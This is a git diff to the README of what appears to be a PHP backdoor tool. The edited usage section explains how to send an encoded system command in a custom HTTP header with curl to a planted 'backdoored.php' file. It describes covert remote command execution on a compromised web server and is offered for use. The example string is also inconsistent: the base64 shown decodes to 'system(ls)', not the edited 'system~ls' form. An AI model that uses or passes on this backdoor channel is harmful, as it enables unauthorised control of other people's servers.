diff --git a/README.md b/README.md index dd5d6f8..86991f8 100644 --- a/README.md +++ b/README.md @@ -35,7 +35,7 @@ For example, the code below will execute the `ls` command: #### Usage This one a bit complex.\ -Lets say you want to run `system(ls)` so write it as `system~` and then base64 encode it i.e. `c3lzdGVtKGxzKQ==`\ +Lets say you want to run `system(ls)` so write it as `system~ls` and then base64 encode it i.e. `c3lzdGVtKGxzKQ==`\ Now add any **1** character at the start of it. Let say 'x' so it will be `xc3lzdGVtKGxzKQ==`\ Now open your terminal and type the following command\ `curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php`\